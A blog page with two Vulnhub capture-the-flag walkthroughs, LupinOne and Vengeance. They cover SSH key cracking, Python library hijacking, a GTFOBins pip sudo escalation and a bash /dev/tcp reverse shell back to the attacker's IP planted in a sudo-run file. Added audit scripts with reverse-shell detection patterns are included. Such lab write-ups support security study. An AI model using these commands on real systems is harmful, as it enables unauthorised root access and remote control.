Showing posts with label CTF. Show all posts

Empire: LupinOne Vulnhub Walkthrough

Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put their skills to the test. Enumeration is the key, so let's get started and figure out how to break this machine down into manageable pieces.

Pentesting Methodology

Network Scanning

       netdiscover

       nmap

Enumeration

       abusing HTTP

       fuzzing

Exploitation

       john

       ssh

Privilege Escalation

       linpeas

       python library hijacking

       pip

       root flag

Level: Easy-Medium

Network Scanning

To begin, we must use the netdiscover command to scan the network for the IP address of the victim machine.

Next, we run Nmap against the target to see which services are open.

 

nmap -sC -sV 192.168.1.2

 

We have, according to the nmap output:

       on port 22 there is an SSH server.

       an HTTP service (Apache Server) running on port 80, as well as a /~myfiles page.

 



 

Enumeration

We began enumeration by visiting the /~myfiles page over HTTP. It returned an Error 404, which seemed suspicious.

http://192.168.1.2/~myfiles/



Viewing the page source revealed the comment “you can do it, keep trying”.



So we turned to fuzzing to dig some additional information out of this page. Using ffuf, we found a directory named secret.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.2/~FUZZ'



Looking closely at the secret directory, the author hints that an SSH private key file belonging to the user “icex64” is hidden here, and that we need to fuzz for it.



To locate that private SSH key we fuzzed again with ffuf, this time for hidden (dot-prefixed) files, and found a text file (.mysecret.txt).

ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.1.2/~secret/.FUZZ' -fc 403 -e .txt,.html



We opened .mysecret.txt in a web browser. It appears to be a private SSH key, but it is encoded. On closer examination the encoding is base58.

http://192.168.1.2/~secret/.mysecret.txt



We looked up a base58 decoder online and landed on browserling, a very basic online base58 decoder aimed at web developers and programmers.

Simply paste the data into the form, click the Base-58 Decode button, and the decoded output appears. After decoding we had our SSH key.
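The decoding step can just as well be done offline, which matters here because the data being decoded is private key material and an online converter is a third party that now has a copy of it. The following is an added example (not code from the lab or the original post): a plain base58 decoder using the Bitcoin alphabet, plus an encoder used only to round-trip a constructed sample key header. SAMPLE_KEY is a placeholder and not the key from the machine.

```python
# Added example: offline base58 decode/encode (Bitcoin alphabet), so key
# material never has to be pasted into a web tool. SAMPLE_KEY is constructed
# placeholder text, not the key from the lab.
from typing import Dict

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX: Dict[str, int] = {c: i for i, c in enumerate(ALPHABET)}

SAMPLE_KEY = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
    b"b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMw==\n"
    b"-----END OPENSSH PRIVATE KEY-----\n"
)


def b58decode(text: str) -> bytes:
    """Decode base58 text to bytes; whitespace (line wraps copied from a web page) is ignored."""
    text = "".join(text.split())
    value = 0
    for ch in text:
        digit = INDEX.get(ch)
        if digit is None:
            # 0, O, I and l are deliberately absent from the alphabet.
            raise ValueError(f"not a base58 character: {ch!r}")
        value = value * 58 + digit
    # Each leading '1' (the zero digit) stands for one leading zero byte.
    leading = len(text) - len(text.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading + body


def b58encode(data: bytes) -> str:
    """Encode bytes to base58; used here to round-trip the constructed sample."""
    leading = len(data) - len(data.lstrip(b"\x00"))
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 58)
        digits.append(ALPHABET[rem])
    return "1" * leading + "".join(reversed(digits))


def looks_like_private_key(data: bytes) -> bool:
    """Sanity check that decoding produced PEM-style private key text."""
    return data.startswith(b"-----BEGIN ") and b"PRIVATE KEY-----" in data


if __name__ == "__main__":
    encoded = b58encode(SAMPLE_KEY)
    decoded = b58decode(encoded)
    print(encoded)
    print(decoded.decode(), looks_like_private_key(decoded))
```

Paste the contents of the downloaded file into `b58decode` and write the result to a file with mode 600 before handing it to ssh; the `looks_like_private_key` check tells you quickly whether the guess about the encoding was right.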



Exploitation

Since the author hinted that the SSH key is protected by a passphrase, we use ssh2john to convert the key into a hash that john can crack.

locate ssh2john

/usr/share/john/ssh2john.py sshkey > hash

Now, use john to crack the hash value.

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

In a few seconds, bingo!! We obtained the SSH key passphrase (P@55w0rd!).



We now have everything needed for an SSH login: the icex64 username, the SSH key and the cracked passphrase (P@55w0rd!).

ssh -i sshkey icex64@192.168.1.2

Bang!! We are logged in over SSH as icex64. We promptly checked this user's sudo permissions and discovered a Python script that can be run with elevated rights. Examining that script, we saw that it could be exploited using the Python Library Hijacking approach.

sudo -l

cat /home/arsene/heist.py



Privilege Escalation

We've started the privilege escalation process. To begin with the Python Library Hijacking technique, we must first find the location of webbrowser.py, the library the script loads. That's why we're employing the linpeas script.

We had already downloaded the linpeas script from its GitHub page. On our Kali machine we navigate to that directory and launch a basic Python HTTP server.

python -m SimpleHTTPServer 80



Now we switch back to the icex64 terminal. We changed to the /tmp directory and pulled the linpeas script from our Kali machine using wget.

cd /tmp

wget 192.168.1.3/linpeas.sh

Then we gave the script full permissions and ran it right away.

chmod 777 linpeas.sh

./linpeas.sh



Within seconds linpeas gave us the location of the Python library file (webbrowser.py).



We can now begin the Python Library Hijacking procedure, in which a library on the import path is modified so that a privileged script executes the attacker's code instead of the library's; you can learn more about this technique here.

To abuse this Python library, we opened webbrowser.py with nano and edited it to spawn /bin/bash.

os.system("/bin/bash")



After all of this effort, we run the script with sudo, using the exact command listed in icex64's sudo permissions check, to switch from user icex64 to arsene.

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
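What made this escalation possible is that a library file on the script's import path was writable by a user other than its owner. The following is an added example (not code from the lab or the original post) that audits a Python script for exactly that condition: it lists the modules the script imports, resolves each one along the search path, and reports any module file, or any directory searched before the real module, that group or world can write to. The `demo` function builds a constructed heist.py/webbrowser.py pair in a temporary directory; the names are taken from the walkthrough but the contents are invented here.

```python
# Added example: audit which modules a Python script imports and whether any of
# them (or a directory searched before them) is writable by non-owners, which is
# the precondition for Python library hijacking. The demo builds a constructed
# heist.py/webbrowser.py pair in a temp dir; nothing here is the lab's own code.
import ast
import os
import stat
import sys
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

Finding = Tuple[str, str, str]  # (module, problem, path)


def imported_modules(script: Path) -> List[str]:
    """Top-level module names from import statements (relative imports skipped)."""
    tree = ast.parse(script.read_text())
    names = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names += [alias.name.split(".")[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.append(node.module.split(".")[0])
    return sorted(set(names))


def writable_by_others(path: Path) -> bool:
    """True if the group or world write bit is set, i.e. a non-owner could edit it."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script(script_path: str, search_path: Optional[List[str]] = None) -> List[Finding]:
    script = Path(script_path).resolve()
    # Python searches the script's own directory first, then the rest of sys.path.
    extra = sys.path if search_path is None else search_path
    search = [script.parent] + [Path(p) for p in extra]
    findings: List[Finding] = []
    for mod in imported_modules(script):
        resolved: Optional[Path] = None
        for directory in search:
            for candidate in (directory / f"{mod}.py", directory / mod / "__init__.py"):
                if candidate.is_file():
                    resolved = candidate
                    break
            if resolved:
                break
            # A writable directory searched before the real module lets anyone
            # drop a same-named file there and shadow the genuine library.
            if directory.is_dir() and writable_by_others(directory):
                findings.append((mod, "writable directory searched first", str(directory)))
        if resolved is None:
            continue  # built-in or compiled module, not a .py file on disk
        if writable_by_others(resolved):
            findings.append((mod, "writable module file", str(resolved)))
    return findings


def demo(module_mode: int) -> List[Finding]:
    """Constructed scenario: a script importing webbrowser next to a webbrowser.py
    with the given mode. 0o666 mirrors the lab's misconfiguration, 0o644 is fixed."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "heist.py").write_text(
            "import os\nimport webbrowser\nwebbrowser.open('http://example.invalid')\n"
        )
        lib = root / "webbrowser.py"
        lib.write_text("def open(url):\n    print('opening', url)\n")
        os.chmod(lib, module_mode)
        # search_path=[] keeps the audit inside the temp dir for a deterministic result
        return audit_script(str(root / "heist.py"), search_path=[])


if __name__ == "__main__":
    print("vulnerable:", demo(0o666))
    print("hardened:  ", demo(0o644))
```

Run `audit_script("/path/to/script.py")` against any script that appears in a sudo rule; an empty result means no imported library can be tampered with by a non-owner, which is the fix for this class of issue (the library file should be root-owned with mode 644).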

Now running as arsene, we checked this user's sudo permissions and found that arsene can execute the pip binary as root without authentication. After a few more moments of evaluation, pip privilege escalation was the obvious idea.

sudo -l



We used the GTFOBins instructions provided here to conduct pip privilege escalation. If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

To conduct pip privilege escalation, we only need to run these three commands.

TF=$(mktemp -d)

echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

sudo pip install $TF

Yippee!! Finally, we have root; the id command confirms it. We change into the root directory and, Congo!!, we obtain the root flag.



This is how we got a root shell on this machine. It was a terrific exercise and a lot of fun. To understand the many scenarios it covers, it is worth trying it yourself.

Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedIn and Twitter.

 


digital world.local: Vengeance Vulnhub Walkthrough

Donavan's VENGEANCE (digitalworld.local: VENGEANCE) is a medium-level machine designed for Vulnhub. This lab includes a difficult exploitation procedure and is suitable for experienced CTF players who want to put their talents to the test. So, let's get started and find out how to divide things up into reasonable chunks.

Pentesting Methodology

Network Scanning

        netdiscover

        nmap

Enumeration

        abusing http

        enum4linux

        smbclient

Exploitation

        Cewl

        john

        SSH

Privilege Escalation

        pspy64

        tftp

        netcat

        Root Flag

Level: Medium

Network Scanning

To start, we have to use the netdiscover command to scan the network for the IP address of the target machine.

 

netdiscover

 

In this scenario, the victim's IP address is 192.168.1.180.



 

To take this further, we now turn to Nmap, scanning all ports to see which services are open so that we may proceed.

nmap -p- -sV 192.168.1.180

 

This system is running a variety of services, according to the findings of the nmap scan.

 



 

Enumeration

We'll start with HTTP. Since Apache is listening on port 80, we open it in the browser to see if anything interesting comes up.



Looking for information on that page, we ran into a redirection to another hostname. We decided to take this into account as we progressed on this machine.



So we added the IP and hostname to the /etc/hosts file to reach the machine under that name.

cat /etc/hosts



Nothing useful was found there, so since Samba was running on port 445 we opted to run the enum4linux script.

enum4linux 192.168.1.180



In a couple of seconds, we discovered that SMB shares are available on this machine, along with their names.



With the help of the script, we also discovered two users on this system: sara and qinyi.



Exploitation

Now we must begin our exploitation phase using the information obtained through enumeration. First, we attempt to connect to the smb using smbclient.

smbclient -L 192.168.1.180

We got the same listing that the enum4linux script gave us. As a result, we must examine these shares. There is a user named sara, as we already know, so we'll start with the sarapublic$ share.

smbclient //192.168.1.180/sarapublic$

We found a lot of information in this share. We used the get command to download all the zip and text files to our system so that we could analyse them one at a time.

        get eaurouge.txt

        get eassy.txt

        get gio.zip

        get blurb.txt

        get profile.txt

 



We discovered nothing directly after opening all of these text files, so we went back to the sarapublic$ share for additional data.



We received one more file from that location, which is a zip file. However, it is password protected, so it must be cracked in order to be analysed.

Then an idea occurred: we can use those text files to create a word list that will be very useful for brute forcing. Since cewl reads from a URL, we launched a Python HTTP server in the directory containing all of those files.

python -m SimpleHTTPServer 80



Cewl then turns those text files into a word list for brute forcing. We'll start with profile.txt and then go on to the other text files one at a time.

cewl 192.168.1.3/profile.txt -w dict.txt

On our system, we use locate to find the exact path of zip2john.

locate zip2john

We obtained the hash of the gio.zip file using zip2john. We can now utilize our dict.txt to crack.

/usr/sbin/zip2john gio.zip > hash



Because we have a dictionary and a hash value, we can utilize john to crack this hash value. Congratulations!! We obtained the password for the gio.zip file which is nanotechnological.

john --wordlist=dict.txt hash



With the cracked password we extracted the archive using the unzip command and received three files: a txt, a png and a pptx.

unzip gio.zip

First, we examined the png file and found nothing of note. Then we examined the text file, which describes the format of a password phrase: name_corner_circuit.

cat gio/pass_remainder.txt



Opening the pptx, the first slide gives us a name, which we noted down as instructed by the pass_remainder.txt file.



The picture on the 3rd slide gives the name written in its corner. Putting all of these details together, we arrived at our password (giovanni_130R_Suzuka).



Privilege Escalation

It's a great opportunity to start the privilege escalation procedure. We have a password (giovanni_130R_Suzuka), and we know that ssh is operating on port 22222. We also received two user names, sara and qinyi.

So, on ssh login, we begin with user qinyi.

ssh qinyi@192.168.1.180 -p 22222

Checking sudo, we discovered that this user can run a file called eaurouge with sudo, but we can't modify it directly because this user lacks the necessary permissions on it.



We use the pspy64 tool to learn more about this lab. It is a command-line utility that allows you to spy on processes without requiring root access. It lets you watch commands run by other users, cron jobs, and so on as they run.

We just use the wget command to download the tool from github.

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

We gave it all permissions with the chmod command and ran it straight away.

chmod 777 pspy64

./pspy64

We quickly discovered that something was serving port 69. The sudo check earlier had already given us the exact location of the file (/home/sara/private/eaurouge).



First, we use nmap to determine whether or not port 69 is open. We discovered that it is operating the tftp service.

nmap -sU -p69 192.168.1.180

We connect to the TFTP service and download the eaurouge file that the background process serves.

tftp 192.168.1.180

get eaurouge

After opening it, we determined that we could place a reverse shell in the eaurouge file.

cat eaurouge


Using the nano command, we inserted our reverse shell into this file.

bash -c 'exec bash -i &>/dev/tcp/192.168.1.3/8888 <&1'





Now we connect to the TFTP service once more and upload the modified file back to the server.

tftp 192.168.1.180

put eaurouge




Following that, we run this file with sudo as the qinyi user.

sudo /home/sara/private/eaurouge



After all of this hard work, our netcat listener on port 8888 receives the connection from the reverse shell.

Yippee!!! We obtained root, moved the directory to root, and obtained our Root Flag.

nc -lvp 8888

cat proof.txt
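The root cause here is a sudo rule pointing at a file that a non-root user could replace (via an unauthenticated TFTP write) before it ran. The following is an added example (not code from the lab or the original post) of the check a defender would run over any sudo target: it reports a target that is not root-owned or is group/world writable, a parent directory that is world-writable without the sticky bit, and content that already carries reverse-shell indicators. The `demo` function uses the page's own /dev/tcp one-liner as constructed sample content in a temporary file; the file name eaurouge is borrowed from the walkthrough.

```python
# Added example: audit a file that a sudo rule allows a user to execute.
# Reports ownership/permission problems on the file and its parents, and scans
# the content for reverse-shell indicators. Sample content is constructed.
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import List, Tuple

Finding = Tuple[str, str]  # (kind, detail)

# Patterns commonly seen in shell reverse-shell one-liners.
INDICATORS = [
    re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+"),  # bash network redirection
    re.compile(r"\bbash\s+-i\b"),                           # interactive shell from a script
    re.compile(r"\bnc\b[^\n]*\s-e\s"),                      # netcat with -e
]


def scan_for_reverse_shell(lines: List[str]) -> List[Finding]:
    """One finding per line that matches any indicator pattern."""
    found: List[Finding] = []
    for no, line in enumerate(lines, 1):
        for pat in INDICATORS:
            if pat.search(line):
                found.append(("reverse-shell indicator", f"line {no}: {pat.pattern}"))
                break
    return found


def audit_sudo_target(path_str: str) -> List[Finding]:
    path = Path(path_str).resolve()
    findings: List[Finding] = []
    st = path.stat()
    if st.st_uid != 0:
        findings.append(("target not owned by root", f"uid {st.st_uid}"))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("target writable by non-owner", oct(st.st_mode & 0o777)))
    for parent in path.parents:
        pm = parent.stat().st_mode
        # World-writable parent without the sticky bit: anyone could replace the file.
        if pm & stat.S_IWOTH and not pm & stat.S_ISVTX:
            findings.append(("parent dir world-writable", str(parent)))
    try:
        lines = path.read_text(errors="replace").splitlines()
    except OSError as exc:
        findings.append(("unreadable", str(exc)))
        return findings
    findings += scan_for_reverse_shell(lines)
    return findings


# Constructed sample contents; the tampered one carries the page's /dev/tcp line.
TAMPERED = (
    "#!/bin/bash\n"
    "echo 'eau rouge'\n"
    "bash -c 'exec bash -i &>/dev/tcp/192.168.1.3/8888 <&1'\n"
)
CLEAN = "#!/bin/bash\necho 'eau rouge'\n"


def demo(content: str, mode: int) -> List[Finding]:
    """Write the content to a temp file with the given mode and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / "eaurouge"
        target.write_text(content)
        os.chmod(target, mode)
        return audit_sudo_target(str(target))


if __name__ == "__main__":
    for kind, detail in demo(TAMPERED, 0o666):
        print(f"{kind}: {detail}")
    print("clean file findings:", [k for k, _ in demo(CLEAN, 0o755)])
```

Pointed at the real path from `sudo -l`, an empty result (apart from the content scan) means the file and every directory above it are controlled by root, which is what removes the write-then-sudo path used in this lab; the TFTP write access that made the replacement possible is a separate finding for the service configuration.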



This lab, I must say, is a pleasant exercise with some challenging moves. It is appropriate for experienced CTF players who wish to put their skills to the test in these environments. Donavan, you did an excellent job.

Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedIn and Twitter.